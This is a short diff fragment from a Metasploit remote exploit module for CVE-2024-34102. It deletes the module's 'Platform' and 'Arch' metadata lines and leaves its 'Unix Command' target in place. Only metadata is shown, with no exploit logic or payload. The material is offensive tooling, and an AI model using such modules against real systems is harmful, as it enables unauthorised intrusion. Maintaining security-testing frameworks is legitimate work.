@@ -63,9 +63,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'CVE', '2024-34102']
         ],
         'License' => MSF_LICENSE,
-        'Platform' => %w[linux unix],
         'Privileged' => false,
-        'Arch' => [ ARCH_CMD ],
         'Targets' => [
           [
             'Unix Command',
